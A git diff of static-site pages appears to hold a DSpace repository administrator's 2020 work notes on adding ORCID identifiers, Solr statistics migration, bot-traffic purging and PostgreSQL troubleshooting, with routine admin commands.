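print("\n".join(unique_orcids))
```

Using a set before sorting mirrors `sort | uniq`, though the exact ordering of `sort` in the shell depends on the locale.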
      @@ -425,16 +425,16 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
       
    • I checked the database for likely matches to the author name and then created a CSV with the author names and ORCID iDs:
    dc.contributor.author,cg.creator.id
    -"King, Brian","Brian King: 0000-0002-7056-9214"
    -"Ortiz-Crespo, Berta","Berta Ortiz-Crespo: 0000-0002-6664-0815"
    -"Ekesa, Beatrice","Beatrice Ekesa: 0000-0002-2630-258X"
    -"Ekesa, B.","Beatrice Ekesa: 0000-0002-2630-258X"
    -"Ekesa, B.N.","Beatrice Ekesa: 0000-0002-2630-258X"
    -"Gullotta, G.","Gaia Gullotta: 0000-0002-2240-3869"
    +"King, Brian","Brian King: 0000-0002-7056-9214"
    +"Ortiz-Crespo, Berta","Berta Ortiz-Crespo: 0000-0002-6664-0815"
    +"Ekesa, Beatrice","Beatrice Ekesa: 0000-0002-2630-258X"
    +"Ekesa, B.","Beatrice Ekesa: 0000-0002-2630-258X"
    +"Ekesa, B.N.","Beatrice Ekesa: 0000-0002-2630-258X"
    +"Gullotta, G.","Gaia Gullotta: 0000-0002-2240-3869"
     
    • Running the add-orcid-identifiers-csv.py script I added 32 ORCID iDs to items on CGSpace!
    -
    $ ./add-orcid-identifiers-csv.py -i /tmp/2020-03-26-ciat-orcids.csv -db dspace -u dspace -p 'fuuu'
    +
    $ ./add-orcid-identifiers-csv.py -i /tmp/2020-03-26-ciat-orcids.csv -db dspace -u dspace -p 'fuuu'
     
    • Udana from IWMI asked about some items that are missing Altmetric donuts on CGSpace
        @@ -447,13 +447,13 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i

      2020-03-29

        -
      • Add two more Bioversity ORCID iDs to CGSpace and then tag ~70 of the authors' existing publications in the database using this CSV with my add-orcid-identifiers-csv.py script:
      • +
      • Add two more Bioversity ORCID iDs to CGSpace and then tag ~70 of the authors’ existing publications in the database using this CSV with my add-orcid-identifiers-csv.py script:
      dc.contributor.author,cg.creator.id
      -"Snook, L.K.","Laura Snook: 0000-0002-9168-1301"
      -"Snook, L.","Laura Snook: 0000-0002-9168-1301"
      -"Zheng, S.J.","Sijun Zheng: 0000-0003-1550-3738"
      -"Zheng, S.","Sijun Zheng: 0000-0003-1550-3738"
      +"Snook, L.K.","Laura Snook: 0000-0002-9168-1301"
      +"Snook, L.","Laura Snook: 0000-0002-9168-1301"
      +"Zheng, S.J.","Sijun Zheng: 0000-0003-1550-3738"
      +"Zheng, S.","Sijun Zheng: 0000-0003-1550-3738"
       
      • Deploy latest Bioversity and CIAT updates on CGSpace (linode18) and DSpace Test (linode26)
      • Deploy latest Ansible infrastructure playbooks on CGSpace and DSpace Test to get the latest dspace-statistics-api (v1.1.1) and Tomcat (7.0.103) versions
      • diff --git a/docs/2020-04/index.html b/docs/2020-04/index.html index db6a7574d..bdd2eb88b 100644 --- a/docs/2020-04/index.html +++ b/docs/2020-04/index.html @@ -48,7 +48,7 @@ The third item now has a donut with score 1 since I tweeted it last week On the same note, the one item Abenet pointed out last week now has a donut with score of 104 after I tweeted it last week "/> - + @@ -171,14 +171,14 @@ On the same note, the one item Abenet pointed out last week now has a donut with
    -
    $ psql -h localhost -U postgres dspace -c "DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value LIKE '%Ballantyne%';"
    +
    $ psql -h localhost -U postgres dspace -c "DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value LIKE '%Ballantyne%';"
     DELETE 97
    -$ ./add-orcid-identifiers-csv.py -i 2020-04-07-peter-orcids.csv -db dspace -u dspace -p 'fuuu' -d
    +$ ./add-orcid-identifiers-csv.py -i 2020-04-07-peter-orcids.csv -db dspace -u dspace -p 'fuuu' -d
     
    • I used this CSV with the script (all records with his name have the name standardized like this):
    dc.contributor.author,cg.creator.id
    -"Ballantyne, Peter G.","Peter G. Ballantyne: 0000-0001-9346-2893"
    +"Ballantyne, Peter G.","Peter G. Ballantyne: 0000-0001-9346-2893"
     
    • Then I tried another way, to identify all duplicate ORCID identifiers for a given resource ID and group them so I can see if count is greater than 1:
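The grouping idea can be sketched in Python, assuming the rows have already been exported as (resource ID, ORCID text value) pairs. The function name `find_duplicate_orcids` and the resource IDs in the sample are hypothetical; this is not the query that was actually run.

```python
from collections import Counter


def find_duplicate_orcids(rows):
    """Group (resource_id, text_value) pairs and keep those seen more than once."""
    counts = Counter(rows)
    return {key: n for key, n in counts.items() if n > 1}


# Hypothetical rows: resource 1 carries the same identifier twice
rows = [
    (1, "Peter G. Ballantyne: 0000-0001-9346-2893"),
    (1, "Peter G. Ballantyne: 0000-0001-9346-2893"),
    (2, "Andy Jarvis: 0000-0001-6543-0798"),
]

duplicates = find_duplicate_orcids(rows)
for (resource_id, text_value), n in duplicates.items():
    print(resource_id, text_value, n)
```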
    @@ -188,31 +188,31 @@ COPY 15209
  • Of those, about nine authors had duplicate ORCID identifiers over about thirty records, so I created a CSV with all their name variations and ORCID identifiers:
  • dc.contributor.author,cg.creator.id
    -"Ballantyne, Peter G.","Peter G. Ballantyne: 0000-0001-9346-2893"
    -"Ramirez-Villegas, Julian","Julian Ramirez-Villegas: 0000-0002-8044-583X"
    -"Villegas-Ramirez, J","Julian Ramirez-Villegas: 0000-0002-8044-583X"
    -"Ishitani, Manabu","Manabu Ishitani: 0000-0002-6950-4018"
    -"Manabu, Ishitani","Manabu Ishitani: 0000-0002-6950-4018"
    -"Ishitani, M.","Manabu Ishitani: 0000-0002-6950-4018"
    -"Ishitani, M.","Manabu Ishitani: 0000-0002-6950-4018"
    -"Buruchara, Robin A.","Robin Buruchara: 0000-0003-0934-1218"
    -"Buruchara, Robin","Robin Buruchara: 0000-0003-0934-1218"
    -"Jarvis, Andy","Andy Jarvis: 0000-0001-6543-0798"
    -"Jarvis, Andrew","Andy Jarvis: 0000-0001-6543-0798"
    -"Jarvis, A.","Andy Jarvis: 0000-0001-6543-0798"
    -"Tohme, Joseph M.","Joe Tohme: 0000-0003-2765-7101"
    -"Hansen, James","James Hansen: 0000-0002-8599-7895"
    -"Hansen, James W.","James Hansen: 0000-0002-8599-7895"
    -"Asseng, Senthold","Senthold Asseng: 0000-0002-7583-3811"
    +"Ballantyne, Peter G.","Peter G. Ballantyne: 0000-0001-9346-2893"
    +"Ramirez-Villegas, Julian","Julian Ramirez-Villegas: 0000-0002-8044-583X"
    +"Villegas-Ramirez, J","Julian Ramirez-Villegas: 0000-0002-8044-583X"
    +"Ishitani, Manabu","Manabu Ishitani: 0000-0002-6950-4018"
    +"Manabu, Ishitani","Manabu Ishitani: 0000-0002-6950-4018"
    +"Ishitani, M.","Manabu Ishitani: 0000-0002-6950-4018"
    +"Ishitani, M.","Manabu Ishitani: 0000-0002-6950-4018"
    +"Buruchara, Robin A.","Robin Buruchara: 0000-0003-0934-1218"
    +"Buruchara, Robin","Robin Buruchara: 0000-0003-0934-1218"
    +"Jarvis, Andy","Andy Jarvis: 0000-0001-6543-0798"
    +"Jarvis, Andrew","Andy Jarvis: 0000-0001-6543-0798"
    +"Jarvis, A.","Andy Jarvis: 0000-0001-6543-0798"
    +"Tohme, Joseph M.","Joe Tohme: 0000-0003-2765-7101"
    +"Hansen, James","James Hansen: 0000-0002-8599-7895"
    +"Hansen, James W.","James Hansen: 0000-0002-8599-7895"
    +"Asseng, Senthold","Senthold Asseng: 0000-0002-7583-3811"
     
    • Then I deleted all their existing ORCID identifier records:
    -
    dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value SIMILAR TO '%(0000-0001-6543-0798|0000-0001-9346-2893|0000-0002-6950-4018|0000-0002-7583-3811|0000-0002-8044-583X|0000-0002-8599-7895|0000-0003-0934-1218|0000-0003-2765-7101)%';
    +
    dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value SIMILAR TO '%(0000-0001-6543-0798|0000-0001-9346-2893|0000-0002-6950-4018|0000-0002-7583-3811|0000-0002-8044-583X|0000-0002-8599-7895|0000-0003-0934-1218|0000-0003-2765-7101)%';
     DELETE 994
     
    • And then I added them again using the add-orcid-identifiers-csv.py script:
    -
    $ ./add-orcid-identifiers-csv.py -i 2020-04-07-fix-duplicate-orcids.csv -db dspace -u dspace -p 'fuuu' -d
    +
    $ ./add-orcid-identifiers-csv.py -i 2020-04-07-fix-duplicate-orcids.csv -db dspace -u dspace -p 'fuuu' -d
     
    • I ran the fixes on DSpace Test and CGSpace as well
    • I started testing the pull request sent by Atmire yesterday @@ -230,7 +230,7 @@ DELETE 994
    -
    dspace63=# DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');
    +
    dspace63=# DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');
     dspace63=# CREATE EXTENSION pgcrypto;
     
    • Then DSpace 6.3 started up OK and I was able to see some statistics in the Content and Usage Analysis (CUA) module, but not on community, collection, or item pages @@ -243,7 +243,7 @@ dspace63=# CREATE EXTENSION pgcrypto;
    • And I remembered I actually need to run the DSpace 6.4 Solr UUID migrations:
    -
    $ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
    +
    $ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
     $ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
     
    • Run system updates on DSpace Test (linode26) and reboot it
    • @@ -258,7 +258,7 @@ $ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
    • I realized that solr-upgrade-statistics-6x only processes 100,000 records by default so I think we actually need to finish running it for all legacy Solr records before asking Atmire why CUA statlets and detailed statistics aren’t working
    • For now I am just doing 250,000 records at a time on my local environment:
    -
    $ export JAVA_OPTS="-Xmx2000m -Dfile.encoding=UTF-8"
    +
    $ export JAVA_OPTS="-Xmx2000m -Dfile.encoding=UTF-8"
     $ ~/dspace63/bin/dspace solr-upgrade-statistics-6x -n 250000
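A rough back-of-the-envelope check of how many invocations a full migration needs, assuming each run handles at most the number of records given by `-n` (100,000 by default, per the note above) and using the roughly 1.5 million local Solr records mentioned in these notes. The helper name `runs_needed` is hypothetical.

```python
import math


def runs_needed(total_records: int, batch_size: int) -> int:
    """Number of invocations needed if each run migrates at most batch_size records."""
    return math.ceil(total_records / batch_size)


total = 1_500_000  # approximate size of the local statistics core

print(runs_needed(total, 100_000))  # with the default batch size
print(runs_needed(total, 250_000))  # with -n 250000
```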
     
    • Despite running the migration for all of my local 1.5 million Solr records, I still see a few hundred thousand like -1 and 0-unmigrated @@ -284,7 +284,7 @@ $ podman start artifactory
      • A few days ago Peter asked me to update an author’s name on CGSpace and in the controlled vocabularies:
      -
      dspace=# UPDATE metadatavalue SET text_value='Knight-Jones, Theodore J.D.' WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value='Knight-Jones, T.J.D.';
      +
      dspace=# UPDATE metadatavalue SET text_value='Knight-Jones, Theodore J.D.' WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value='Knight-Jones, T.J.D.';
       
      • I updated his existing records on CGSpace, changed the controlled lists, added his ORCID identifier to the controlled list, and tagged his thirty-nine items with the ORCID iD
      • The new DSpace 6 stuff that Atmire sent modifies Mirage 2’s pom.xml to copy the resulting node_modules into each theme after building and installing with ant update, because they moved some packages from bower to npm and now reference them in page-structure.xsl @@ -315,7 +315,7 @@ $ podman start artifactory
        • Looking into a high rate of outgoing bandwidth from yesterday on CGSpace (linode18):
        -
        # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "19/Apr/2020:0[6789]" | goaccess --log-format=COMBINED -
        +
        # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "19/Apr/2020:0[6789]" | goaccess --log-format=COMBINED -
         
        • One host in Russia (91.241.19.70) downloaded 23GiB over those few hours in the morning
            @@ -325,7 +325,7 @@ $ podman start artifactory
          # grep -c 91.241.19.70 /var/log/nginx/access.log.1
           8900
          -# grep 91.241.19.70 /var/log/nginx/access.log.1 | grep -c '10568/35187'
          +# grep 91.241.19.70 /var/log/nginx/access.log.1 | grep -c '10568/35187'
           8900
           
          • I thought the host might have been Yandex misbehaving, but its user agent is:
          • @@ -343,20 +343,20 @@ Total number of bot hits purged: 8909
        • While investigating that I noticed ORCID identifiers missing from a few authors’ names, so I added them with my add-orcid-identifiers-csv.py script:
        -
        $ ./add-orcid-identifiers-csv.py -i 2020-04-20-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
        +
        $ ./add-orcid-identifiers-csv.py -i 2020-04-20-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
         
        • The contents of 2020-04-20-add-orcids.csv were:
        dc.contributor.author,cg.creator.id
        -"Schut, Marc","Marc Schut: 0000-0002-3361-4581"
        -"Schut, M.","Marc Schut: 0000-0002-3361-4581"
        -"Kamau, G.","Geoffrey Kamau: 0000-0002-6995-4801"
        -"Kamau, G","Geoffrey Kamau: 0000-0002-6995-4801"
        -"Triomphe, Bernard","Bernard Triomphe: 0000-0001-6657-3002"
        -"Waters-Bayer, Ann","Ann Waters-Bayer: 0000-0003-1887-7903"
        -"Klerkx, Laurens","Laurens Klerkx: 0000-0002-1664-886X"
        +"Schut, Marc","Marc Schut: 0000-0002-3361-4581"
        +"Schut, M.","Marc Schut: 0000-0002-3361-4581"
        +"Kamau, G.","Geoffrey Kamau: 0000-0002-6995-4801"
        +"Kamau, G","Geoffrey Kamau: 0000-0002-6995-4801"
        +"Triomphe, Bernard","Bernard Triomphe: 0000-0001-6657-3002"
        +"Waters-Bayer, Ann","Ann Waters-Bayer: 0000-0003-1887-7903"
        +"Klerkx, Laurens","Laurens Klerkx: 0000-0002-1664-886X"
         
          -
        • I confirmed some of the authors' names from the report itself, then by looking at their profiles on ORCID.org
        • +
        • I confirmed some of the authors’ names from the report itself, then by looking at their profiles on ORCID.org
        • Add new ILRI subject “COVID19” to the 5_x-prod branch
        • Add new CCAFS Phase II project tags to the 5_x-prod branch
        • I will deploy these to CGSpace in the next few days
        • @@ -387,17 +387,17 @@ Total number of bot hits purged: 8909
      -
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
      +
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
       $ time chrt -i 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
       
      • I ran the dspace cleanup -v process on CGSpace and got an error:
      -
      Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
      -  Detail: Key (bitstream_id)=(184980) is still referenced from table "bundle".
      +
      Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
      +  Detail: Key (bitstream_id)=(184980) is still referenced from table "bundle".
       
      • The solution is, as always:
      -
      $ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);'
      +
      $ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);'
       UPDATE 1
       
      • I spent some time working on the XMLUI themes in DSpace 6 @@ -413,7 +413,7 @@ UPDATE 1
      .breadcrumb > li + li:before {
      -  content: "/\00a0";
      +  content: "/\00a0";
       }
       

      2020-04-27

        @@ -421,9 +421,9 @@ UPDATE 1
      • My changes to DSpace XMLUI Mirage 2 build process mean that we don’t need Ruby gems at all anymore! We can completely build without them!
      • Trying to test the com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI script but there is an error:
      -
      Exception: org.apache.solr.search.SyntaxError: Cannot parse 'cua_version:${cua.version.number}': Encountered " "}" "} "" at line 1, column 32.
      +
      Exception: org.apache.solr.search.SyntaxError: Cannot parse 'cua_version:${cua.version.number}': Encountered " "}" "} "" at line 1, column 32.
       Was expecting one of:
      -    "TO" ...
      +    "TO" ...
           <RANGE_QUOTED> ...
           <RANGE_GOOP> ...
       
        @@ -473,7 +473,7 @@ atmire-cua.version.number=${cua.version.number}
    -
    Record uid: ee085cc0-0110-42c5-80b9-0fad4015ed9f couldn't be processed
    +
    Record uid: ee085cc0-0110-42c5-80b9-0fad4015ed9f couldn't be processed
     com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: ee085cc0-0110-42c5-80b9-0fad4015ed9f, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
             at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(AtomicStatisticsUpdater.java:304)
             at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(AtomicStatisticsUpdater.java:176)
    @@ -508,7 +508,7 @@ Caused by: java.lang.NullPointerException
     
     
     
    -
    $ grep ERROR dspace.log.2020-04-29 | cut -f 3- -d' ' | sort | uniq -c | sort -n
    +
    $ grep ERROR dspace.log.2020-04-29 | cut -f 3- -d' ' | sort | uniq -c | sort -n
           1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL findByUnique Error -
           1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL find Error -
           1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL query singleTable Error -
    @@ -524,25 +524,25 @@ Caused by: java.lang.NullPointerException
     
    • Database connections do seem high:
    -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
           5 dspaceApi
           6 dspaceCli
          88 dspaceWeb
     
    • Most of those are idle in transaction:
    -
    $ psql -c 'select * from pg_stat_activity' | grep 'dspaceWeb' | grep -c "idle in transaction"
    +
    $ psql -c 'select * from pg_stat_activity' | grep 'dspaceWeb' | grep -c "idle in transaction"
     67
     
    • I don’t see anything in the PostgreSQL or Tomcat logs suggesting anything is wrong… I think the solution to clear these idle connections is probably to just restart Tomcat
    • I looked at the Solr stats for this month and see lots of suspicious IPs:
    -
    $ curl -s 'http://localhost:8081/solr/statistics/select?q=*:*&fq=dateYearMonth:2020-04&rows=0&wt=json&indent=true&facet=true&facet.field=ip'
    +
    $ curl -s 'http://localhost:8081/solr/statistics/select?q=*:*&fq=dateYearMonth:2020-04&rows=0&wt=json&indent=true&facet=true&facet.field=ip'
     
    -        "88.99.115.53",23621, # Hetzner, using XMLUI and REST API with no user agent
    -        "104.154.216.0",11865,# Google cloud, scraping XMLUI with no user agent
    -        "104.198.96.245",4925,# Google cloud, using REST API with no user agent
    -        "52.34.238.26",2907,  # EcoSearch on XMLUI, user agent: EcoSearch (+https://search.ecointernet.org/)
    +        "88.99.115.53",23621, # Hetzner, using XMLUI and REST API with no user agent
    +        "104.154.216.0",11865,# Google cloud, scraping XMLUI with no user agent
    +        "104.198.96.245",4925,# Google cloud, using REST API with no user agent
    +        "52.34.238.26",2907,  # EcoSearch on XMLUI, user agent: EcoSearch (+https://search.ecointernet.org/)
     
    • And a bunch more… ugh…
        @@ -561,10 +561,10 @@ $ ./check-spider-ip-hits.sh -f /tmp/ips -s statistics -p
      • Then I added a few of them to the bot mapping in the nginx config because it appears they are regular harvesters since 2018
      • Looking through the Solr stats faceted by the userAgent field I see some interesting ones:
      -
      $ curl 'http://localhost:8081/solr/statistics/select?q=*%3A*&rows=0&wt=json&indent=true&facet=true&facet.field=userAgent'
      +
      $ curl 'http://localhost:8081/solr/statistics/select?q=*%3A*&rows=0&wt=json&indent=true&facet=true&facet.field=userAgent'
       ...
      -"Delphi 2009",50725,
      -"OgScrper/1.0.0",12421,
      +"Delphi 2009",50725,
      +"OgScrper/1.0.0",12421,
       
      • Delphi is only used by IP addresses in Greece, so that’s obviously the GARDIAN people harvesting us…
      • I have no idea what OgScrper is, but it’s not a user!
      • @@ -586,11 +586,11 @@ $ ./check-spider-hits.sh -f /tmp/agents -s statistics -p
      • That’s about 300,000 hits purged…
      • Then remove the ones with spaces manually, checking the query syntax first, then deleting in yearly cores and the statistics core:
      -
      $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=userAgent:/Delphi 2009/&rows=0"
      +
      $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=userAgent:/Delphi 2009/&rows=0"
       ...
      -<lst name="responseHeader"><int name="status">0</int><int name="QTime">52</int><lst name="params"><str name="q">userAgent:/Delphi 2009/</str><str name="rows">0</str></lst></lst><result name="response" numFound="38760" start="0"></result>
      -$ for year in {2010..2019}; do curl -s "http://localhost:8081/solr/statistics-$year/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Delphi 2009"</query></delete>'; done
      -$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Delphi 2009"</query></delete>'
      +<lst name="responseHeader"><int name="status">0</int><int name="QTime">52</int><lst name="params"><str name="q">userAgent:/Delphi 2009/</str><str name="rows">0</str></lst></lst><result name="response" numFound="38760" start="0"></result>
      +$ for year in {2010..2019}; do curl -s "http://localhost:8081/solr/statistics-$year/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Delphi 2009"</query></delete>'; done
      +$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Delphi 2009"</query></delete>'
       
      • Quoting them works for now until I can look into it and handle it properly in the script
      • This was about 400,000 hits in total purged from the Solr statistics
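One way the quoting could be handled when building the delete body is sketched below in Python. It is an assumption about how a script might do it, not what `check-spider-hits.sh` does: the function name `build_delete_query` is hypothetical, and the escaping covers only backslashes and double quotes inside the phrase plus the XML special characters.

```python
from xml.sax.saxutils import escape


def build_delete_query(user_agent: str) -> str:
    """Build a Solr delete-by-query XML body matching a user agent as a quoted phrase."""
    # Escape backslashes and double quotes so the value stays one Solr phrase
    phrase = user_agent.replace("\\", "\\\\").replace('"', '\\"')
    query = f'userAgent:"{phrase}"'
    # escape() handles &, < and > so the query is safe inside the XML element
    return f"<delete><query>{escape(query)}</query></delete>"


body = build_delete_query("Delphi 2009")
print(body)
```

The resulting string is what would be passed to `curl --data-binary` against each yearly core and then the main statistics core.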
      • @@ -607,7 +607,7 @@ $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true&quo
      # mv /etc/letsencrypt /etc/letsencrypt.bak
      -# /opt/certbot-auto certonly --standalone --email fu@m.com -d dspacetest.cgiar.org --standalone --pre-hook "/bin/systemctl stop nginx" --post-hook "/bin/systemctl start nginx"
      +# /opt/certbot-auto certonly --standalone --email fu@m.com -d dspacetest.cgiar.org --standalone --pre-hook "/bin/systemctl stop nginx" --post-hook "/bin/systemctl start nginx"
       # /opt/certbot-auto revoke --cert-path /etc/letsencrypt.bak/live/dspacetest.cgiar.org/cert.pem
       # rm -rf /etc/letsencrypt.bak
       
        @@ -618,11 +618,11 @@ $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true&quo
        • But I don’t see a lot of connections in PostgreSQL itself:
        -
        $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
        +
        $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
               5 dspaceApi
               6 dspaceCli
              14 dspaceWeb
        -$ psql -c 'select * from pg_stat_activity' | wc -l
        +$ psql -c 'select * from pg_stat_activity' | wc -l
         30
         
        • Tezira said she cleared her browser cache and then was able to submit again diff --git a/docs/2020-05/index.html b/docs/2020-05/index.html index 6213c4ff5..a8ef8257c 100644 --- a/docs/2020-05/index.html +++ b/docs/2020-05/index.html @@ -34,7 +34,7 @@ I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2 "/> - + @@ -166,7 +166,7 @@ I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2
      -
      # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "07/May/2020:(01|03|04)" | goaccess --log-format=COMBINED -
      +
      # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "07/May/2020:(01|03|04)" | goaccess --log-format=COMBINED -
       
      • The two main IPs making requests around then are 188.134.31.88 and 212.34.8.188
          @@ -211,9 +211,9 @@ Total number of bot hits purged: 192332
        $ cat 2020-05-11-add-orcids.csv
         dc.contributor.author,cg.creator.id
        -"Lutakome, P.","Pius Lutakome: 0000-0002-0804-2649"
        -"Lutakome, Pius","Pius Lutakome: 0000-0002-0804-2649"
        -$ ./add-orcid-identifiers-csv.py -i 2020-05-11-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
        +"Lutakome, P.","Pius Lutakome: 0000-0002-0804-2649"
        +"Lutakome, Pius","Pius Lutakome: 0000-0002-0804-2649"
        +$ ./add-orcid-identifiers-csv.py -i 2020-05-11-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
         
        • Run system updates on CGSpace (linode18) and reboot it
            @@ -265,8 +265,8 @@ $ ./add-orcid-identifiers-csv.py -i 2020-05-11-add-orcids.csv -db dspace -u dspa
          $ cat 2020-05-19-add-orcids.csv
           dc.contributor.author,cg.creator.id
          -"Bahta, Sirak T.","Sirak Bahta: 0000-0002-5728-2489"
          -$ ./add-orcid-identifiers-csv.py -i 2020-05-19-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
          +"Bahta, Sirak T.","Sirak Bahta: 0000-0002-5728-2489"
          +$ ./add-orcid-identifiers-csv.py -i 2020-05-19-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
           
          • An IITA user is having issues submitting to CGSpace and I see there is a rising number of PostgreSQL connections waiting in transaction and in lock:
          @@ -300,9 +300,9 @@ $ ./add-orcid-identifiers-csv.py -i 2020-05-19-add-orcids.csv -db dspace -u dspa
        $ cat 2020-05-25-add-orcids.csv
         dc.contributor.author,cg.creator.id
        -"Díaz, Manuel F.","Manuel Francisco Diaz Baca: 0000-0001-8996-5092"
        -"Díaz, Manuel Francisco","Manuel Francisco Diaz Baca: 0000-0001-8996-5092"
        -$ ./add-orcid-identifiers-csv.py -i 2020-05-25-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
        +"Díaz, Manuel F.","Manuel Francisco Diaz Baca: 0000-0001-8996-5092"
        +"Díaz, Manuel Francisco","Manuel Francisco Diaz Baca: 0000-0001-8996-5092"
        +$ ./add-orcid-identifiers-csv.py -i 2020-05-25-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
         
        • Last week Maria asked again about searching for items by accession or issue date
            @@ -327,7 +327,7 @@ $ ./add-orcid-identifiers-csv.py -i 2020-05-25-add-orcids.csv -db dspace -u dspa
        -
        # cat /var/log/nginx/*.log.1 | grep -E "29/May/2020:(02|03|04|05)" | goaccess --log-format=COMBINED -
        +
        # cat /var/log/nginx/*.log.1 | grep -E "29/May/2020:(02|03|04|05)" | goaccess --log-format=COMBINED -
         
        • The top is 172.104.229.92, which is the AReS harvester (still not using a user agent, but it’s tagged as a bot in the nginx mapping)
        • Second is 188.134.31.88, which is a Russian host that we also saw in the last few weeks, using a browser user agent and hitting the XMLUI (but it is tagged as a bot in nginx as well)
        • @@ -361,13 +361,13 @@ $ ./add-orcid-identifiers-csv.py -i 2020-05-25-add-orcids.csv -db dspace -u dspa
          $ sudo su - postgres
           $ dropdb dspacetest
           $ createdb -O dspacetest --encoding=UNICODE dspacetest
          -$ psql dspacetest -c 'alter user dspacetest superuser;'
          +$ psql dspacetest -c 'alter user dspacetest superuser;'
           $ pg_restore -d dspacetest -O --role=dspacetest /tmp/cgspace_2020-05-31.backup
          -$ psql dspacetest -c 'alter user dspacetest nosuperuser;'
          +$ psql dspacetest -c 'alter user dspacetest nosuperuser;'
           # run DSpace 5 version of update-sequences.sql!!!
           $ psql -f /home/dspace/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
          -$ psql dspacetest -c "DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');"
          -$ psql dspacetest -c 'CREATE EXTENSION pgcrypto;'
          +$ psql dspacetest -c "DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');"
          +$ psql dspacetest -c 'CREATE EXTENSION pgcrypto;'
           $ exit
           
          • Now switch to the DSpace 6.x branch and start a build:
          • @@ -391,7 +391,7 @@ $ ant update
          • I had a mistake in my Solr internal URL parameter so DSpace couldn’t find it, but once I fixed that DSpace starts up OK!
          • Once the initial Discovery reindexing was completed (after three hours or so!) I started the Solr statistics UUID migration:
          -
          $ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
          +
          $ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
           $ dspace solr-upgrade-statistics-6x -i statistics -n 250000
           $ dspace solr-upgrade-statistics-6x -i statistics -n 1000000
           $ dspace solr-upgrade-statistics-6x -i statistics -n 1000000
          @@ -400,8 +400,8 @@ $ dspace solr-upgrade-statistics-6x -i statistics -n 1000000
           
        • It’s taking about 35 minutes for 1,000,000 records…
        • Some issues towards the end of this core:
        -
        Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
        -org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
        +
        Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
        +org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
                 at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
